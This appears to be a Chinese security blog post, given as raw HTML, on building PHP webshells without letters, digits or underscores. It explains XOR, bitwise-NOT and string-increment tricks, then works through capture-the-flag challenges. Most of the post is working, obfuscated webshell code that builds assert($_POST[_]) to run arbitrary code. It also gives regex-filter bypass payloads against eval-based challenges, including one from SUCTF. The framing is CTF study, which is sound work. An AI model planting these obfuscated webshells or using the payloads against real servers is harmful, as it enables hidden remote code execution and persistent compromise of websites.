<!DOCTYPE html>
<html lang="zh-CN">


<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
  <title>
    不用字母数字下划线的webshell | 道萝岗特森&#39;s Blog
  </title>
  <meta name="description" content="hello world">
  
  <meta name="keywords" content="
  技术总结,php,webshell
  ">
  
  <meta name="author" content="daolgts">

  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">
  <meta name="theme-color" content="#1e2327">
  <link rel="apple-touch-icon" href="https://github.githubassets.com/apple-touch-icon.png">
  <link rel="apple-touch-icon" sizes="180x180" href="https://github.githubassets.com/apple-touch-icon-180x180.png">

  <link rel="icon" type="image/x-icon" href="/images/xixi.png">
  <link rel="stylesheet" href="/css/main.css">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
  

  
<script>
  var _hmt = _hmt || [];
  (function(){var hm = document.createElement("script");
    hm.src = "//hm.baidu.com/hm.js?a868b3c37552464bd253d45da4b33ddf";
    var s = document.getElementsByTagName("script")[0];s.parentNode.insertBefore(hm, s);})();
</script>


  <script src="//cdnjs.cloudflare.com/ajax/libs/vue/1.0.25-csp/vue.min.js"></script>
  <script src="//cdnjs.cloudflare.com/ajax/libs/moment.js/2.11.2/moment.min.js"></script>
</head>

<body id="replica-app">

<nav class="navbar-wrapper">
  <div class="navbar">
    <div class="container clearfix">
      <a href="/" class="navbar-logo"><i class="fa fa-github"></i></a>

      <div class="navbar-search float-left desktop-only">
        <div class="navbar-search-form">
          <label for="gsc-i-id1">This website</label>
          <div id="google-search">
            <gcse:search></gcse:search>
          </div>
        </div>
      </div>

      <ul class="navbar-nav float-left">
        
        <li><a href="/archives">Archives</a></li>
        
        <!--  -->
        
        <li><a href="/tags">Tags</a></li>
        
        
          <li><a href="/links">Links</a></li>
        
        
          <li><a href="/about">About</a></li>
        
        
      </ul>

      <ul class="navbar-nav user-nav float-right desktop-only">
        <li class="user-nav-notification">
          <a><span class="user-nav-unread"></span><i class="fa fa-bell"></i></a>
        </li>
        <li>
          <a><i class="fa fa-plus"></i> <i class="fa fa-caret-down"></i></a>
        </li>
        <li class="user-nav-logo">
          <a><img src="/images/avatar.png"> <i class="fa fa-caret-down"></i></i></a>
        </li>
      </ul>
    </div>
  </div>
</nav>

<div class="main-container">
  <header class="header-wrapper desktop-only">
  <div class="container header-site-detail">
    <ul class="header-toolbar">
      <li class="clearfix">
        <a href="/archives" class="header-toolbar-left"><i
                  class="fa fa-file-text"></i> Posts </a>
        <a href="/archives"
           class="header-toolbar-right"> 35 </a>
      </li>
      <li>
        <a href="/tags" class="header-toolbar-left"><i
                  class="fa fa-tags"></i> Tags </a>
        <a href="/tags"
           class="header-toolbar-right"> 15 </a>
      </li>
      <li>
        <a href="/categories" class="header-toolbar-left"><i
                  class="fa fa-folder-open"></i> Categories </a>
        <a href="/categories"
           class="header-toolbar-right"> 0 </a>
      </li>
    </ul>
    <h2 class="header-title">
      <i class="fa fa-book text-muted"></i>
      <a href="/">道萝岗特森&#39;s Blog</a>
      
      
    </h2>
  </div>

  <div class="container">
    <div class="header-tab-wrapper clearfix">
      <span class="header-tab header-tab-selected"><i class="fa fa-thumbs-o-up"></i> Like</span>
      <span class="header-tab"><i class="fa fa-share-alt"></i> Share</span>
      <span class="header-tab"><i class="fa fa-comments-o"></i> Discussion</span>
      <span class="header-tab"><i class="fa fa-bookmark-o"></i> Bookmark </span>
      <span class="header-tab"><i class="fa fa-smile-o"></i> Smile <i class="fa fa-caret-down"></i></span>
    </div>
  </div>
</header>


<div class="post-container container">
  <h3>
    <i class="fa fa-user-o"></i>
    daolgts

    <span class="post-date float-right" title="{{moment(1533987636000).format('MMM DD, YYYY, h:mm:ss A')}}">
      <i class="fa fa-pencil-square-o"></i>
      {{moment(1533987636000).fromNow()}}
    </span>
  </h3>

  <article class="post-content">
    <h1>不用字母数字下划线的webshell</h1>
    <h3 id="铺垫知识"><a href="#铺垫知识" class="headerlink" title="铺垫知识"></a>铺垫知识</h3><h4 id="异或"><a href="#异或" class="headerlink" title="异或^"></a>异或<code>^</code></h4><p>在 PHP 中两个变量进行异或时，会先将字符串转换成 ASCII 值，再将 ASCII 值转换成二进制再进行异或，异或完又将结果从二进制转换成ASCII值，再转换成字符串。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">php &gt; @$_++;echo $_;</span><br><span class="line">1</span><br><span class="line">php &gt; echo &quot;.&quot;^&quot;~&quot;;</span><br><span class="line">P</span><br><span class="line">php &gt; echo &apos;]@\`@@]&apos;^&apos;:%(&amp;,!:&apos;;</span><br><span class="line">getFlag</span><br><span class="line">php &gt; echo &apos;Flag&apos;^&apos;:@&amp;:&apos;;</span><br><span class="line">|,G]</span><br></pre></td></tr></table></figure>

<h4 id="取反"><a href="#取反" class="headerlink" title="取反~"></a>取反<code>~</code></h4><p>负数用十六进制表示，通常用的是补码的方式表示。负数的补码是它本身的值每位求反,最后再加一。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">php &gt; echo ~䏀[1];</span><br><span class="line">PHP Notice:  Use of undefined constant 䏀 - assumed &apos;䏀&apos; in php shell code on line 1</span><br><span class="line">p</span><br><span class="line">php &gt; echo ~&apos;䏀&apos;[1];</span><br><span class="line">p</span><br><span class="line">php &gt; echo ~&quot;\x8c&quot;;</span><br><span class="line">s</span><br><span class="line">php &gt; echo ~&quot;\xa0\xb8\xba\xab&quot;;</span><br><span class="line">_GET</span><br></pre></td></tr></table></figure>

<h4 id="不用数字构造数字"><a href="#不用数字构造数字" class="headerlink" title="不用数字构造数字"></a>不用数字构造数字</h4><p> php 中未定义的变量默认值为 null，null==false==0</p>
<p>所以能通过对未定义变量的自增操作来得到一个数字。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">php &gt; $_++;echo $_;</span><br><span class="line">PHP Notice:  Undefined variable: _ in php shell code on line 1</span><br><span class="line">1</span><br><span class="line">//加个@不会报错</span><br><span class="line">php &gt; @$_++;echo $_;</span><br><span class="line">1</span><br></pre></td></tr></table></figure>

<p>null==null==1,只能是一不能增减</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">php &gt; $_=_==_;echo $_;</span><br><span class="line">PHP Notice:  Use of undefined constant _ - assumed &apos;_&apos; in php shell code on line 1</span><br><span class="line">PHP Notice:  Use of undefined constant _ - assumed &apos;_&apos; in php shell code on line 1</span><br><span class="line">1</span><br><span class="line">//加个@不会报错</span><br><span class="line">php &gt; @$_=_==_;echo $_;</span><br><span class="line">1</span><br><span class="line">php &gt; echo $_++;</span><br></pre></td></tr></table></figure>

<p>有了数字1也就能构造其他数字</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">php &gt; $_=(&apos;&gt;&apos;&gt;&apos;&lt;&apos;)+(&apos;&gt;&apos;&gt;&apos;&lt;&apos;);</span><br><span class="line">php &gt; print($_);</span><br><span class="line">2</span><br><span class="line">php &gt; print($_/$_);</span><br><span class="line">1</span><br></pre></td></tr></table></figure>

<h4 id="递增／递减运算符"><a href="#递增／递减运算符" class="headerlink" title="递增／递减运算符"></a>递增／递减运算符</h4><p>字符变量只能递增不能递减，只支持纯字母</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">php &gt; $_=&apos;a&apos;;</span><br><span class="line">php &gt; echo ++$_;</span><br><span class="line">b</span><br><span class="line">php &gt; echo ++$_;</span><br><span class="line">c</span><br><span class="line">php &gt; $_=&apos;z&apos;;</span><br><span class="line">php &gt; echo ++$_;</span><br><span class="line">aa</span><br></pre></td></tr></table></figure>

<p>强制连接数组和字符串的话，数组将被转换成字符串，其值为 Array。再取这个字符串的第一个字母，就可以获得 ‘A’。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">php &gt; $_=[];</span><br><span class="line">php &gt; $_=@&quot;$_&quot;;</span><br><span class="line">php &gt; echo $_;</span><br><span class="line">Array</span><br><span class="line">php &gt; echo $_[0];</span><br><span class="line">A</span><br></pre></td></tr></table></figure>

<h3 id="不用数字字母的webshell"><a href="#不用数字字母的webshell" class="headerlink" title="不用数字字母的webshell"></a>不用数字字母的webshell</h3><p>栗子1</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">if(!preg_match(&apos;/[a-z0-9]/is&apos;,$_GET[&apos;shell&apos;])) &#123;</span><br><span class="line"> eval($_GET[&apos;shell&apos;]);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$_=(&apos;%01&apos;^&apos;`&apos;).(&apos;%13&apos;^&apos;`&apos;).(&apos;%13&apos;^&apos;`&apos;).(&apos;%05&apos;^&apos;`&apos;).(&apos;%12&apos;^&apos;`&apos;).(&apos;%14&apos;^&apos;`&apos;); // $_=&apos;assert&apos;;</span><br><span class="line">$__=&apos;_&apos;.(&apos;%0D&apos;^&apos;]&apos;).(&apos;%2F&apos;^&apos;`&apos;).(&apos;%0E&apos;^&apos;]&apos;).(&apos;%09&apos;^&apos;]&apos;); // $__=&apos;_POST&apos;;</span><br><span class="line">$___=$$__;</span><br><span class="line">$_($___[_]); // assert($_POST[_]);</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$__=(&apos;&gt;&apos;&gt;&apos;&lt;&apos;)+(&apos;&gt;&apos;&gt;&apos;&lt;&apos;);//$__2</span><br><span class="line">$_=$__/$__;//$_1</span><br><span class="line"></span><br><span class="line">$____=&apos;&apos;;</span><br><span class="line">$___=&quot;瞰&quot;;$____.=~($___&#123;$_&#125;);$___=&quot;和&quot;;$____.=~($___&#123;$__&#125;);$___=&quot;和&quot;;$____.=~($___&#123;$__&#125;);$___=&quot;的&quot;;$____.=~($___&#123;$_&#125;);$___=&quot;半&quot;;$____.=~($___&#123;$_&#125;);$___=&quot;始&quot;;$____.=~($___&#123;$__&#125;);//$____=assert</span><br><span class="line"></span><br><span class="line">$_____=&apos;_&apos;;$___=&quot;俯&quot;;$_____.=~($___&#123;$__&#125;);$___=&quot;瞰&quot;;$_____.=~($___&#123;$__&#125;);$___=&quot;次&quot;;$_____.=~($___&#123;$_&#125;);$___=&quot;站&quot;;$_____.=~($___&#123;$_&#125;);//$_____=_POST</span><br><span class="line"></span><br><span class="line">$_=$$_____;//$_=$_POST</span><br><span class="line">$____($_[$__]);//assert($_POST[2])</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$_=[];</span><br><span class="line">$_=@&quot;$_&quot;; // $_=&apos;Array&apos;;</span><br><span class="line">$_=$_[&apos;!&apos;==&apos;@&apos;]; // $_=$_[0];</span><br><span class="line">$___=$_; // A</span><br><span class="line">$__=$_;</span><br><span class="line">$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;</span><br><span class="line">$___.=$__; // S</span><br><span class="line">$___.=$__; // S</span><br><span class="line">$__=$_;</span><br><span class="line">$__++;$__++;$__++;$__++; // E</span><br><span class="line">$___.=$__;</span><br><span class="line">$__=$_;</span><br><span class="line">$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R</span><br><span class="line">$___.=$__;</span><br><span class="line">$__=$_;</span><br><span class="line">$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T</span><br><span class="line">$___.=$__;</span><br><span class="line"></span><br><span class="line">$____=&apos;_&apos;;</span><br><span class="line">$__=$_;</span><br><span class="line">$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P</span><br><span class="line">$____.=$__;</span><br><span class="line">$__=$_;</span><br><span class="line">$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O</span><br><span class="line">$____.=$__;</span><br><span class="line">$__=$_;</span><br><span class="line">$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S</span><br><span class="line">$____.=$__;</span><br><span class="line">$__=$_;</span><br><span class="line">$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T</span><br><span class="line">$____.=$__;</span><br><span class="line"></span><br><span class="line">$_=$$____;</span><br><span class="line">$___($_[_]); // ASSERT($_POST[_]);</span><br></pre></td></tr></table></figure>

<p>栗子2</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">include&apos;flag.php&apos;;</span><br><span class="line">if(isset($_GET[&apos;code&apos;]))&#123;</span><br><span class="line">   $code=$_GET[&apos;code&apos;];</span><br><span class="line">   if(strlen($code)&gt;40)&#123;</span><br><span class="line">       die(&quot;Long.&quot;);</span><br><span class="line">  &#125;</span><br><span class="line">   if(preg_match(&quot;/[A-Za-z0-9]+/&quot;,$code))&#123;</span><br><span class="line">       die(&quot;NO.&quot;);</span><br><span class="line">  &#125;</span><br><span class="line">   @eval($code);</span><br><span class="line">&#125;else&#123;</span><br><span class="line">   highlight_file(__FILE__);</span><br><span class="line">&#125;</span><br><span class="line">//$hint = &quot;php function getFlag() to get flag&quot;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>code长度不超过40，上面的方法就不行了</p>
<p>payload1</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?code=$_=&quot;`&#123;&#123;&#123;&quot;^&quot;?&lt;&gt;/&quot;;$&#123;$_&#125;[_]($&#123;$_&#125;[__]);&amp;_=getFlag</span><br><span class="line">?code=$_=&quot;`&#123;&#123;&#123;&quot;^&quot;?&lt;&gt;/&quot;;$&#123;$_&#125;[_]();&amp;_=getFlag//括号里不需要再写。。</span><br></pre></td></tr></table></figure>

<p>表示 <code>_GET</code>，<code>${$_}[_](${$_}[__]);</code>等于 <code>$_GET[_]($_GET[__]);</code>，传getFlag给_</p>
<p>payload2<br>直接写getFlag()函数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=$_=(&apos;][%2B:@_:&apos;^&apos;:&gt;_|,&gt;]&apos;);$_();</span><br></pre></td></tr></table></figure>

<p>注意这里<code>+</code>要写成<code>%2B</code>的url编码形式</p>
<h3 id="不用数字字母下划线的webshell"><a href="#不用数字字母下划线的webshell" class="headerlink" title="不用数字字母下划线的webshell"></a>不用数字字母下划线的webshell</h3><p>栗子</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">include&apos;flag.php&apos;;</span><br><span class="line"></span><br><span class="line">if(isset($_GET[&apos;code&apos;]))&#123;</span><br><span class="line">   $code=$_GET[&apos;code&apos;];</span><br><span class="line">   if(strlen($code)&gt;50)&#123;</span><br><span class="line">       die(&quot;Too Long.&quot;);</span><br><span class="line">  &#125;</span><br><span class="line">   if(preg_match(&quot;/[A-Za-z0-9_]+/&quot;,$code))&#123;</span><br><span class="line">       die(&quot;Not Allowed.&quot;);</span><br><span class="line">  &#125;</span><br><span class="line">   @eval($code);</span><br><span class="line">&#125;else&#123;</span><br><span class="line">   highlight_file(__FILE__);</span><br><span class="line">&#125;</span><br><span class="line">//$hint = &quot;php function getFlag() to get flag&quot;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;$&quot;.(&quot;`&quot;^&quot;?&quot;).(&quot;:&quot;^&quot;&#125;&quot;).(&quot;&gt;&quot;^&quot;&#123;&quot;).(&quot;/&quot;^&quot;&#123;&quot;).&quot;[&apos;+&apos;]&quot;&amp;+=getFlag();//$_GET[&apos;+&apos;]&amp;+=getFlag();</span><br></pre></td></tr></table></figure>

<p>精简后</p>
<pre><code>${&quot;`{{{&quot;^&quot;?&lt;&gt;/&quot;}[&apos;+&apos;]();&amp;+=getFlag</code></pre><p>这里利用了<code>${}</code>中的代码是可以执行的特点，其实也就是可变变量。</p>
<p>payload2<br>取反</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=%24%7B%7E%22%A0%B8%BA%AB%22%7D%5B%AA%5D%28%29%3B&amp;%aa=getFlag</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2018/08/11/5b6ebc448c6c1.png" alt></p>
<p>payload3</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">code=$啊=(%27%5D%40%5C%60%40%40%5D%27^%27%3A%25%28%26%2C%21%3A%27);$啊();</span><br></pre></td></tr></table></figure>

<h3 id="SUCTF-getshell"><a href="#SUCTF-getshell" class="headerlink" title="SUCTF getshell"></a>SUCTF getshell</h3><ul>
<li>只剩下<code>$().;=[]_~\n</code>能用</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$_=_==_;</span><br><span class="line">$__=~䏀[$_].~䍀[$_].~䖀[$_].~䑀[$_].~䋀[$_].~䙀[$_];</span><br><span class="line">$___=~䠀[$_].~一[$_].~亀[$_].~䫀[$_];</span><br><span class="line">$__($$___[$_]); // printf($_GET[&quot;1&quot;]);</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">        $__=[];</span><br><span class="line">        $___=[];</span><br><span class="line">        $_=$__==$___;//true = 1   用作索引</span><br><span class="line"></span><br><span class="line">        $__=~(瞰);</span><br><span class="line">        $___=$__[$_];//a</span><br><span class="line">        $__=~(北);</span><br><span class="line">        $___.=$__[$_].$__[$_];//ss</span><br><span class="line">        $__=~(的);</span><br><span class="line">        $___.=$__[$_];//e</span><br><span class="line">        $__=~(半);</span><br><span class="line">        $___.=$__[$_];//r</span><br><span class="line">        $__=~(拾);</span><br><span class="line">        $___.=$__[$_];//t</span><br><span class="line"></span><br><span class="line">        $____=~(~(_));//_</span><br><span class="line">        $__=~(说);</span><br><span class="line">        $____.=$__[$_];//P</span><br><span class="line">        $__=~(小);</span><br><span class="line">        $____.=$__[$_];//O</span><br><span class="line">        $__=~(次);</span><br><span class="line">        $____.=$__[$_];//S</span><br><span class="line">        $__=~(站);</span><br><span class="line">        $____.=$__[$_];//T</span><br><span class="line"></span><br><span class="line">        $_=$$____;</span><br><span class="line">        $___($_[_]);</span><br><span class="line">    ?&gt;</span><br></pre></td></tr></table></figure>
  </article>
</div>


    




</div>

<div class="footer-wrapper container">
  <footer class="footer clearfix">
    <div class="clearfix">
    <a href="https://daolgts.github.io" class="footer-logo">
      <i class="fa fa-github"></i>
    </a>
    <ul class="footer-social-link">
      <li>© 2019 daolgts</li>
      <li><a href="https://daolgts.github.io">Home</a></li>
      
      <li><a href="https://github.com/daolgts">Github</a></li>
      
    </ul>
    <div class="footer-theme-info">
      Theme <a href="//github.com/sabrinaluo/hexo-theme-replica">Replica</a>
      by <a href="//github.com/sabrinaluo">Hiitea</a> ❤ Powered by Hexo
    </div>
    </div>
    
  </footer>
</div>


<script>
  (function() {
    var cx = '005157513716557594323:jvii0oiejlb';
    var gcse = document.createElement('script');
    gcse.type = 'text/javascript';
    gcse.async = true;
    gcse.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') +
      '//cse.google.com/cse.js?cx=' + cx;
    var s = document.getElementsByTagName('script')[0];
    s.parentNode.insertBefore(gcse, s);
  })();
</script>



<script src="/js/main.js"></script>

</body>
</html>
